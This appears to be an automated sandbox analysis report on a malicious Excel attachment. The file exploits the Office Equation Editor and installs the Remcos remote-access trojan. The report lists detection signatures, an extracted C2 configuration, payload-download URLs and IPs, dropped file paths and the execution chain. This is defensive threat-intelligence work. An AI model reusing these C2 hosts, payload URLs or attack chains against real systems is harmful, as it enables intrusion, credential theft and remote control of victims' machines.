Windows Analysis Report
INQUIRY#46789.xla.xlsx

Overview

General Information

Sample name: INQUIRY#46789.xla.xlsx
Analysis ID: 1435412
MD5: 0d63e333a886519ffc1a5d970f651c03
SHA1: 3e7c4b0c53985823575295351c9df683559621b4
SHA256: f6ed112ea28dede0353e033e4fdfbc6a9b8ca3b0fa13a1a5ed503e438e6390a5
Tags: xlaxlsx
Infos:

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Sigma detected: Remcos
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected VBS Downloader Generic
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Command shell drops VBS files
Connects to a pastebin service (likely for C&C)
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Creates autostart registry keys with suspicious values (likely registry only malware)
Delayed program exit found
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Searches for Windows Mail specific files
Shellcode detected
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Excel Network Connections
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
 https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://geoplugin.net/json.gp/C URL Reputation: Label: phishing
Source: http://geoplugin.net/json.gp/C URL Reputation: Label: phishing
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{22E766A3-CA3D-4B6F-BED5-FF71E53845DC}.tmp Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\beautifulroseipictureiseenitsshowingasabeautifulflowerwhichcomingfromtheworldanditsshowinghowbeautiful___sheiswhenthatroseonhairbeautiful[1].doc Avira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\49740FD3.doc Avira: detection malicious, Label: HEUR/Rtf.Malformed
Found malware configuration
Source: 0000001C.00000002.1114379537.0000000000571000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "107.172.31.178:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-NVSJ5U", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Multi AV Scanner detection for domain / URL
Source: uploaddeimagens.com.br Virustotal: Detection: 6% Perma Link
Source: pop.tg Virustotal: Detection: 8% Perma Link
Source: http://pop.tg/ Virustotal: Detection: 8% Perma Link
Source: https://uploaddeimagens.com.br Virustotal: Detection: 6% Perma Link
Source: 107.172.31.178 Virustotal: Detection: 15% Perma Link
Source: https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029 Virustotal: Detection: 15% Perma Link
Multi AV Scanner detection for submitted file
Source: INQUIRY#46789.xla.xlsx Virustotal: Detection: 7% Perma Link
Yara detected Remcos RAT
Source: Yara match File source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.powershell.exe.4529110.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.powershell.exe.4529110.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001C.00000002.1114379537.0000000000571000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.1113827756.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.1114379537.0000000000555000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.568213344.0000000004346000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3664, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 4380, type: MEMORYSTR
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 28_2_00433837
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00404423 FreeLibrary,CryptUnprotectData, 29_2_00404423
Source: powershell.exe, 00000012.00000002.568213344.0000000004346000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_f24f0b03-2

Exploits
barindex
Yara detected UAC Bypass using CMSTP
Source: Yara match File source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.powershell.exe.4529110.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.powershell.exe.4529110.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001C.00000002.1113827756.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.568213344.0000000004346000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3664, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 4380, type: MEMORYSTR
Office equation editor establishes network connection
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 107.175.242.96 Port: 80 Jump to behavior
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe Jump to behavior
Office Equation Editor has been started
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Privilege Escalation
barindex
Contains functionality to bypass UAC (CMSTPLUA)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_004074FD _wcslen,CoGetObject, 28_2_004074FD
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.22:49181 version: TLS 1.0
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\GoogleUpdater Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\chrome_BITS_1864_259209375 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.568213344.00000000041A9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdbSHA256n source: powershell.exe, 00000012.00000002.568213344.00000000041A9000.00000004.00000800.00020000.00000000.sdmp

Spreading
barindex
Yara detected VBS Downloader Generic
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\beautifulrosepictureforcuple[1].gif, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\beautifulpictureforcouples.vbs, type: DROPPED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 28_2_00409253
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 28_2_0041C291
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 28_2_0040C34D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 28_2_00409665
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0044E879 FindFirstFileExA, 28_2_0044E879
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 28_2_0040880C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0040783C FindFirstFileW,FindNextFileW, 28_2_0040783C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW, 28_2_00419AF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 28_2_0040BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 28_2_0040BD37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 28_2_100010F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_10006580 FindFirstFileExA, 28_2_10006580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0040AE51 FindFirstFileW,FindNextFileW, 29_2_0040AE51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 30_2_00407EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 31_2_00407898
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 28_2_00407C97
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini Jump to behavior

Software Vulnerabilities
barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Shellcode detected
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_03600627 ShellExecuteW,ExitProcess, 9_2_03600627
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_036005F9 URLDownloadToFileW,ShellExecuteW,ExitProcess, 9_2_036005F9
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_03600556 LoadLibraryW, 9_2_03600556
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_03600481 ExitProcess, 9_2_03600481
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0360064C ExitProcess, 9_2_0360064C
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_03600612 ShellExecuteW,ExitProcess, 9_2_03600612
Suspicious execution chain found
Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2047750 ET TROJAN Base64 Encoded MZ In Image 172.67.215.45:443 -> 192.168.2.22:49186
Source: Traffic Snort IDS: 2018856 ET TROJAN Windows executable base64 encoded 172.67.215.45:443 -> 192.168.2.22:49186
Source: Traffic Snort IDS: 2025011 ET TROJAN Powershell commands sent B64 2 172.67.215.45:443 -> 192.168.2.22:49186
Source: Traffic Snort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 172.67.215.45:443 -> 192.168.2.22:49186
Source: Traffic Snort IDS: 2020423 ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M1 107.175.242.96:80 -> 192.168.2.22:49187
Source: Traffic Snort IDS: 2020424 ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 2 M1 107.175.242.96:80 -> 192.168.2.22:49187
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\wscript.exe Network Connect: 104.21.84.67 443 Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Domain query: paste.ee
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 107.172.31.178
Connects to a pastebin service (likely for C&C)
Source: unknown DNS query: name: paste.ee
Contains functionality to download and execute PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_036005F9 URLDownloadToFileW,ShellExecuteW,ExitProcess, 9_2_036005F9
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49188 -> 107.172.31.178:2404
Found URL in obfuscated visual basic script code
Source: sabelianos.vbs.26.dr Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
Source: sabelianos.vbs.26.dr Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.br
Source: global traffic HTTP traffic detected: GET /9020/KBFF.txt HTTP/1.1Host: 107.175.242.96Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 107.172.31.178 107.172.31.178
Source: Joe Sandbox View IP Address: 104.21.84.67 104.21.84.67
Source: Joe Sandbox View IP Address: 104.21.84.67 104.21.84.67
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.22:49181 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.242.96
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_036005F9 URLDownloadToFileW,ShellExecuteW,ExitProcess, 9_2_036005F9
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1BA77CFB.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /d/0FQ71 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paste.eeConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /chrome/whats-new/m109?internal=true HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+962; SOCS=CAESHAgCEhJnd3NfMjAyMzA4MDEtMF9SQzMaAmVuIAEaBgiAi8amBg; __Secure-ENID=14.SE=LM-NkPAvbCtuNhK73uRS1U27fKMegq7R6_Ue_GnOGI1dekNKandC6Dto1fKS9ocnnyUmf2MAXGM269U9HhkgndYLxWy3FrZaGzh_yODdv1ouU12fBCNmRhMUwM3dzKbRlYRnbKhIQz9fV5WGdCRRjXQx5RGii6FbIw100Hc46oWQ6bysmy2hqA
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+962; SOCS=CAESHAgCEhJnd3NfMjAyMzA4MDEtMF9SQzMaAmVuIAEaBgiAi8amBg; __Secure-ENID=14.SE=LM-NkPAvbCtuNhK73uRS1U27fKMegq7R6_Ue_GnOGI1dekNKandC6Dto1fKS9ocnnyUmf2MAXGM269U9HhkgndYLxWy3FrZaGzh_yODdv1ouU12fBCNmRhMUwM3dzKbRlYRnbKhIQz9fV5WGdCRRjXQx5RGii6FbIw100Hc46oWQ6bysmy2hqA
Source: global traffic HTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
